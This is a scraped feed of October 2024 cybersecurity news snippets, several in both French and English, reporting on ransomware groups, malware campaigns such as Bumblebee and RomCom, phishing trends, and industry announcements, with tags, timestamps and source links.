www.secnews.physaphae.fr/article.php?IdArticle=8600279 False Ransomware,Threat None 2.0000000000000000 Global Security Mag - Site de news francais Vulnérabilités]]> 2024-10-19T19:43:53+00:00 https://www.globalsecuritymag.fr/ivanti-recapitulatif-du-patch-tuesday-d-octobre.html www.secnews.physaphae.fr/article.php?IdArticle=8600280 False Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A nascent threat actor known as Crypt Ghouls has been linked to a set of cyber attacks targeting Russian businesses and government agencies with ransomware with the twin goals of disrupting business operations and financial gain. "The group under review has a toolkit that includes utilities such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet, resocks, AnyDesk, PsExec, and others,"]]> 2024-10-19T13:09:00+00:00 https://thehackernews.com/2024/10/crypt-ghouls-targets-russian-firms-with.html www.secnews.physaphae.fr/article.php?IdArticle=8600073 False Ransomware,Threat None 3.0000000000000000 ZD Net - Magazine Info ASEAN member states now have a physical CERT facility located in Singapore to exchange threat intel and best practices.]]> 2024-10-19T03:00:15+00:00 https://www.zdnet.com/article/southeast-asia-reiterates-pledge-to-collaborate-amid-growing-cyber-threat-in-ai-era/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=8599990 False Threat None 2.0000000000000000 Dark Reading - Informationweek Branch Microsoft researchers toyed with app permissions to uncover CVE-2024-44133, using it to access sensitive user data. Adware merchants may have as well.]]> 2024-10-18T21:26:11+00:00 https://www.darkreading.com/vulnerabilities-threats/macos-safari-exploit-camera-mic-browser-data www.secnews.physaphae.fr/article.php?IdArticle=8599905 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-18T20:53:46+00:00 https://community.riskiq.com/article/d11b6766 www.secnews.physaphae.fr/article.php?IdArticle=8599904 False Malware,Vulnerability,Threat APT 37 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-18T19:13:56+00:00 https://community.riskiq.com/article/2e683b12 www.secnews.physaphae.fr/article.php?IdArticle=8599884 True Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000 Dark Reading - Informationweek Branch A survey shows three-quarters of CISOs are drowning in threat detections put out by a sprawling stack of tools, yet still lack the basic visibility necessary to identify breaches.]]> 2024-10-18T18:47:52+00:00 https://www.darkreading.com/cloud-security/cisos-throwing-cash-tools-detect-breaches www.secnews.physaphae.fr/article.php?IdArticle=8599866 False Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-18T17:12:34+00:00 https://community.riskiq.com/article/8096d1b3 www.secnews.physaphae.fr/article.php?IdArticle=8599844 True Ransomware,Spam,Malware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-18T16:43:16+00:00 https://community.riskiq.com/article/df7e4bc5 www.secnews.physaphae.fr/article.php?IdArticle=8599824 True Ransomware,Malware,Tool,Threat,Industrial None 3.0000000000000000 taosecurity - Blog Sécurité Chinois PropositionDigital offense capabilities are currently net negative for the security ecosystem.[0]The costs of improved digital offense currently outweigh the benefits. The legitimate benefits of digital offense accrue primarily to the security one percent (#securityonepercent), and to intelligence, military, and law enforcement agencies. The derived defensive benefits depend on the nature of the defender. The entire security ecosystem bears the costs, and in some cases even those who see tangible benefit may suffer costs exceeding those benefits.The ReasonLimitations of scaling are the reason why digital offense capabilities are currently net negative.Consider the case of an actor developing a digital offense capability, and publishing it to the general public. From the target side, limitations on scaling prevent complete mitigation or remediation of the vulnerability.The situation is much different from the offense perspective.Any actor may leverage the offense capability against any Internet-connected target on the planet. The actor can scale that capability across the entire range of vulnerable or exposed targets.The ThreeOnly three sets of actors are able to possibly leverage an offense capability for defensive purposes.First, the organization responsible for developing and maintaining the vulnerable or exposed asset can determine if there is a remedy for the new offense capability. (This is typically a "vendor," but could be a noncommercial entity. As a shorthand, I will use "vendor.") The vendor can try to develop and deploy a patch or mitigation method.Second, major consumers of the vulnerable or exposed asset can take similar steps, usually by implementing the vendor\'s patch or mitigation.Third, the security one percent can take some defensive measures, either by implementing the vendor\'s patch or mitigation, or by developing and acting upon detection and response processes.The combination of the actions by these three sets of actors will not completely remediate the digital offense capab]]> 2024-10-18T15:58:56+00:00 https://taosecurity.blogspot.com/2021/02/digital-offense-capabilities-are.html www.secnews.physaphae.fr/article.php?IdArticle=8599864 False Ransomware,Tool,Vulnerability,Threat,Legislation,Cloud,Technical None 2.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Résumé Bumblebee est un téléchargeur très sophistiqué des cybercriminels utilisés par les cybercriminels pour accéder aux réseaux d'entreprise et livrer d'autres charges utiles telles que les balises de frappe de cobalt et les ransomwares.Le groupe d'analyse Google Threat a d'abord découvert le malware en mars 2022 et l'a nommé Bumblebee sur la base d'une chaîne d'agent utilisateur qu'il a utilisé.L'équipe des laboratoires des menaces de Netskope [& # 8230;]

---

>Summary Bumblebee is a highly sophisticated downloader malware cybercriminals use to gain access to corporate networks and deliver other payloads such as Cobalt Strike beacons and ransomware. The Google Threat Analysis Group first discovered the malware in March 2022 and named it Bumblebee based on a User-Agent string it used. The Netskope Threat Labs team […] ]]> 2024-10-18T15:29:40+00:00 https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence www.secnews.physaphae.fr/article.php?IdArticle=8599783 False Ransomware,Malware,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems. "This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in]]> 2024-10-18T15:13:00+00:00 https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.html www.secnews.physaphae.fr/article.php?IdArticle=8599671 False Malware,Threat None 3.0000000000000000 CybeReason - Vendor blog ]]> 2024-10-18T14:16:35+00:00 https://www.cybereason.com/blog/threat-analysis-beast-ransomware www.secnews.physaphae.fr/article.php?IdArticle=8599760 False Ransomware,Threat None 2.0000000000000000 Dark Reading - Informationweek Branch Traditional practices are no longer sufficient in today\'s threat landscape. It\'s time for cybersecurity professionals to rethink their approach.]]> 2024-10-18T14:00:00+00:00 https://www.darkreading.com/cyber-risk/supply-chain-cybersecurity-traditional-vendor-risk-management www.secnews.physaphae.fr/article.php?IdArticle=8599739 False Threat None 3.0000000000000000 Checkpoint - Fabricant Materiel Securite Un pic d'enregistrement dans les attaques: au troisième trimestre 2024, une moyenne de 1 876 cyberattaques par organisation a été enregistrée, marquant une augmentation de 75% par rapport à la même période en 2023 et une augmentation de 15% par rapport au trimestre précédent.Déchange sur le plan de l'industrie: Le secteur de l'éducation / de la recherche a été le plus ciblé avec 3 828 attaques hebdomadaires, suivie des secteurs gouvernementaux / militaires et de soins de santé, avec 2 553 et 2 434 attaques, respectivement.Faits saillants régionaux: L'Afrique a dû faire face à la moyenne la plus élevée des attaques à 3 370 par semaine (+ 90% en glissement annuel), tandis que l'Europe et l'Amérique latine ont également connu des augmentations significatives.Ransomware: une menace persistante: plus de 1 230 incidents de ransomware ont été signalés, avec l'Amérique du Nord [& # 8230;]

---

>A Record Spike in Attacks: In Q3 2024, an average of 1,876 cyber attacks per organization was recorded, marking a 75% increase compared to the same period in 2023 and a 15% rise from the previous quarter. Industry-wise Breakdown: The Education/Research sector was the most targeted with 3,828 weekly attacks, followed by the Government/Military and Healthcare sectors, with 2,553 and 2,434 attacks, respectively. Regional Highlights: Africa faced the highest average of attacks at 3,370 per week (+90% YoY), while Europe and Latin America also saw significant increases. Ransomware: A Persistent Threat: Over 1,230 ransomware incidents were reported, with North America […] ]]> 2024-10-18T13:00:23+00:00 https://blog.checkpoint.com/research/a-closer-look-at-q3-2024-75-surge-in-cyber-attacks-worldwide/ www.secnews.physaphae.fr/article.php?IdArticle=8599714 False Ransomware,Threat,Medical None 3.0000000000000000 Security Intelligence - Site de news Américain In a world where cyber threats feel omnipresent, a recent report has revealed some unexpected good news: ransomware attacks on state and local governments have dropped by 51% in 2024. Still, this decline does not signal the end of the ransomware threat, nor should it lead to complacency. As the nature of ransomware evolves, so […] ]]> 2024-10-18T13:00:00+00:00 https://securityintelligence.com/articles/whats-behind-51-drop-in-ransomware-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8599761 False Ransomware,Threat None 3.0000000000000000 Recorded Future - FLux Recorded Future A newly identified variant of RomCom malware - which has been attributed to Russian-speaking threat actors - targeted entities in Ukraine and Poland, according to researchers.]]> 2024-10-18T12:32:29+00:00 https://therecord.media/romcom-malware-variant-ukraine-poland-espionage www.secnews.physaphae.fr/article.php?IdArticle=8599718 False Malware,Threat None 2.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET The average time it takes attackers to weaponize a vulnerability, either before or after a patch is released, shrank from 63 days in 2018-2019 to just five days last year]]> 2024-10-18T12:10:04+00:00 https://www.welivesecurity.com/en/videos/threat-actors-exploiting-zero-days-faster-ever-week-security-tony-anscombe/ www.secnews.physaphae.fr/article.php?IdArticle=8600023 False Vulnerability,Threat None 2.0000000000000000 SecurityWeek - Security News Un APT aligné par Pyongyang a été surpris à exploiter un récent zéro-jour dans Internet Explorer dans une attaque de chaîne d'approvisionnement.

---

>A Pyongyang-aligned APT was caught exploiting a recent zero-day in Internet Explorer in a supply chain attack. ]]> 2024-10-18T11:18:15+00:00 https://www.securityweek.com/north-korean-apt-exploited-ie-zero-day-in-supply-chain-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8599693 False Vulnerability,Threat None 4.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023. The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0), said Cisco Talos, which is monitoring the activity cluster under the moniker UAT-5647. "This]]> 2024-10-17T21:43:00+00:00 https://thehackernews.com/2024/10/russian-romcom-attacks-target-ukrainian.html www.secnews.physaphae.fr/article.php?IdArticle=8599318 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-17T20:34:10+00:00 https://community.riskiq.com/article/f496ca75 www.secnews.physaphae.fr/article.php?IdArticle=8599428 False Ransomware,Malware,Tool,Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity researchers have gleaned additional insights into a nascent ransomware-as-a-service (RaaS) called Cicada3301 after successfully gaining access to the group\'s affiliate panel on the dark web. Singapore-headquartered Group-IB said it contacted the threat actor behind the Cicada3301 persona on the RAMP cybercrime forum via the Tox messaging service after the latter put out an]]> 2024-10-17T19:24:00+00:00 https://thehackernews.com/2024/10/cross-platform-cicada3301-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=8599247 False Ransomware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-17T18:58:40+00:00 https://community.riskiq.com/article/6d79c4e3 www.secnews.physaphae.fr/article.php?IdArticle=8599384 True Ransomware,Malware,Tool,Threat,Conference None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-17T17:29:10+00:00 https://community.riskiq.com/article/ef6514e6 www.secnews.physaphae.fr/article.php?IdArticle=8599361 False Malware,Threat None 3.0000000000000000 Korben - Bloger francais 2024-10-17T17:04:25+00:00 https://korben.info/windows-95-sur-nintendo-3ds-prouesse-technique-amusante.html www.secnews.physaphae.fr/article.php?IdArticle=8599316 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa. The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. "]]> 2024-10-17T15:45:00+00:00 https://thehackernews.com/2024/10/sidewinder-apt-strikes-middle-east-and.html www.secnews.physaphae.fr/article.php?IdArticle=8599181 False Threat APT-C-17 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial Cloud security firm Zscaler published on Tuesday its Zscaler ThreatLabz 2024 Mobile, IoT, and OT Threat Report, which... ]]> 2024-10-17T13:16:53+00:00 https://industrialcyber.co/news/zscaler-releases-2024-threat-report-highlighting-need-for-enhanced-security-in-mobile-iot-ot-systems/ www.secnews.physaphae.fr/article.php?IdArticle=8599250 False Threat,Mobile,Industrial None 3.0000000000000000 Checkpoint - Fabricant Materiel Securite Microsoft est identifié comme la cible principale dans les attaques de phishing, avec des changements significatifs observés dans le classement top 10.Dans le domaine de la cybersécurité, les attaques de phishing sont parmi les menaces les plus répandues, servant souvent de étape initiale pour les campagnes à plus grande échelle au sein des chaînes d'approvisionnement.Check Point Research (RCR), la branche de renseignement des menaces de Check Point & Reg;Software Technologies Ltd., a récemment publié son dernier classement de phishing de marque pour le troisième trimestre de 2024. Ce rapport met en lumière les marques les plus fréquemment imitées par les cybercriminels, dans leurs tentatives de tromperie et de voler des informations personnelles ou des informations d'identification de paiement, mettant l'accent sur les [& # 8230;]

---

>Microsoft is identified as the primary target in phishing attacks, with significant shifts observed in the Top 10 rankings. In the realm of cyber security, phishing attacks are among the most prevalent threats, often serving as the initial step for larger-scale campaigns within supply chains. Check Point Research (CPR), the Threat Intelligence arm of Check Point® Software Technologies Ltd., has recently released its latest Brand Phishing Ranking for the third quarter of 2024. This report sheds light on the brands most frequently imitated by cyber criminals, in their attempts to deceive and steal personal information or payment credentials, emphasizing the […] ]]> 2024-10-17T13:00:19+00:00 https://blog.checkpoint.com/research/check-point-research-unveils-q3-2024-brand-phishing-trends-microsoft-remains-most-imitated-brand-as-alibaba-and-adobe-enter-top-10/ www.secnews.physaphae.fr/article.php?IdArticle=8599223 False Threat None 2.0000000000000000 Korben - Bloger francais avec Surfshark – Depuis ses débuts en 2018, Surfshark est surtout connu pour son service VPN. Mais au fil des années ils ont développé une suite de sécurité plutôt complète appelée Surfshark One. Cette solution tout-en-un vise à protéger les utilisateurs (oui, toi là qui me lis) contre une tripotée de menaces en ligne. On va examiner de plus près les fonctionnalités de cet outil et sa pertinence face aux nouveaux défis de cybersécurité.]]> 2024-10-17T10:00:00+00:00 https://korben.info/surfshark-one-antivirus.html www.secnews.physaphae.fr/article.php?IdArticle=8599133 False Threat None 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC 97% of cloud applications used in the enterprise are unmanaged and freely adopted by employees and organizational units. This may seem like minor foul play for the sake of higher productivity, but the downside soon becomes evident. IT teams lose visibility over the “snowballing” cloud ecosystem that suddenly lacks centralized control and potentially opens up a Pandora’s box. Walking a Security Tightrope When cloud sprawl takes over, security problems surface. Without unified oversight, applying consistent security measures across the board becomes an arduous task. This lack of control can impact the company’s security in several ways: Data security gaps: Shadow IT, coupled with too many isolated cloud environments, makes it difficult for IT and security teams to keep a record of sensitive data effectively. This leads to potential data leak or loss. IAM challenges: Cloud accounts that are no longer maintained tend to have weak access controls. This condition complicates identity and access management (IAM), making it harder to protect credentials like API keys and tokens. Expanded attack surface: Each unused or poorly managed cloud resource can become a blind spot, making the environment more vulnerable to cyberattacks. Outdated software, misconfigured settings, and unauthorized access points give malefactors more avenues to exploit. Compliance repercussions: When it comes to regulatory compliance, fragmented data across multiple clouds throws a spanner in the works. Standards like GDPR, HIPAA, and PCI DSS require clear control over data integrity and traceability, but when data storage and security practices aren’t unified, demonstrating compliance becomes a tall order. These risks entail operational difficulties as IT teams juggle vulnerability management, access controls, and security monitoring. Letting the situation slide creates loopholes for cyber threats. A centralized cloud management approach ensures that growth doesn’t outpace oversight. Operational and Financial Fallout Cloud sprawl doesn’t just affect security; it also strains budgets and resources. Orphaned or underused cloud instances add to operational costs and make it hard for organizations to track and optimize their cloud spending. The result is an inflated cloud bill, driven by inefficiencies that could otherwise be avoided. The proliferation of duplicate resources and data across platforms drains processing power, slowing down business-critical]]> 2024-10-17T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/pitfalls-of-cloud-sprawl-and-how-to-avoid-them www.secnews.physaphae.fr/article.php?IdArticle=8599154 False Tool,Vulnerability,Threat,Cloud None 3.0000000000000000 ProofPoint - Cyber Firms Since our July blog, which focused on the increase in mobile political spam volume, unwanted political messaging has continued to grow at a rapid pace. Subscriber reports of these messages increased 67% in September compared with June. We can expect the increases to not only continue, but to accelerate as we approach the November election. As we previously pointed out, most political messaging comes from political action committees, parties and candidates seeking support and donations. Although for many people these messages]]> 2024-10-17T07:31:27+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/spam-text-messages-dos-donts www.secnews.physaphae.fr/article.php?IdArticle=8599221 False Spam,Threat,Mobile,Commercial None 3.0000000000000000 ProofPoint - Cyber Firms We are delighted to announce that John Abel has been appointed as Proofpoint\'s SVP and Chief Information Officer (CIO), effective immediately. John is a seasoned and dynamic technology leader with over 30 years of experience in the IT and security industry, working at global Fortune 500 technology companies, managing teams of over 300 people and overseeing budgets of over $200M. Having led multiple transformations of the IT business function, John has an excellent track record of achieving results by developing strong business relationships, building high-quality teams, and providing best-in-class services. Most recently, John was SVP and CIO at Extreme Networks and prior to that, held senior roles at Veritas, Ellie Mae, Hitachi Data Systems (HDS) and Symantec Corporation.   In his new role, John will be responsible for aligning Proofpoint\'s information technology, global information security, and digital transformation initiatives with the company strategy and business goals. As a business-facing CIO, he will be an important voice of the customer for Proofpoint\'s product teams. Commenting on his appointment, John said: “Proofpoint is trusted by some of the world\'s leading organizations and is at the forefront of cybersecurity innovation. I believe its human-centric approach and unparalleled insights into the threat landscape set it apart from the competition. I am thrilled to join such a dynamic, transformative company and I look forward to building on the exceptional work underway to advance how Proofpoint helps organizations on their jo]]> 2024-10-17T06:00:02+00:00 https://www.proofpoint.com/us/blog/corporate-news/proofpoint-appoints-john-abel-chief-information-officer www.secnews.physaphae.fr/article.php?IdArticle=8599293 False Threat None 2.0000000000000000 Dark Reading - Informationweek Branch A MOIS-aligned threat group has been using Microsoft Exchange servers to exfiltrate sensitive data from Gulf-state government agencies.]]> 2024-10-17T06:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/iran-apt34-ms-exchange-spy-gulf-govts www.secnews.physaphae.fr/article.php?IdArticle=8599077 False Threat APT 34 2.0000000000000000 Intigrity - Blog If there\'s a vulnerability in your systems that cybercriminals could exploit, you\'ll want to know about it. Collaborating with people outside your organization to alert you to these issues can be extremely powerful because it allows your business to discover vulnerabilities before malicious hackers do. This approach, known as vulnerability disclosure, requires clear reporting c…]]> 2024-10-17T00:00:00+00:00 https://blog.intigriti.com/business-insights/12-incident-response-metrics-your-business-should-be-tracking www.secnews.physaphae.fr/article.php?IdArticle=8600896 False Vulnerability,Threat None 3.0000000000000000 Recorded Future - FLux Recorded Future Police did not name the suspect, but a threat actor known as USDoD has long boasted of being behind the attacks that were highlighted by Brazilian law enforcement following the arrest.]]> 2024-10-16T23:57:14+00:00 https://therecord.media/hacker-behind-fbi-npd-airbus-attacks-arrested-brazil www.secnews.physaphae.fr/article.php?IdArticle=8598974 False Threat,Legislation None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors are attempting to abuse the open-source EDRSilencer tool as part of efforts to tamper endpoint detection and response (EDR) solutions and hide malicious activity. Trend Micro said it detected "threat actors attempting to integrate EDRSilencer in their attacks, repurposing it as a means of evading detection." EDRSilencer, inspired by the NightHawk FireBlock tool from MDSec, is]]> 2024-10-16T21:51:00+00:00 https://thehackernews.com/2024/10/hackers-abuse-edrsilencer-tool-to.html www.secnews.physaphae.fr/article.php?IdArticle=8598821 False Tool,Threat None 3.0000000000000000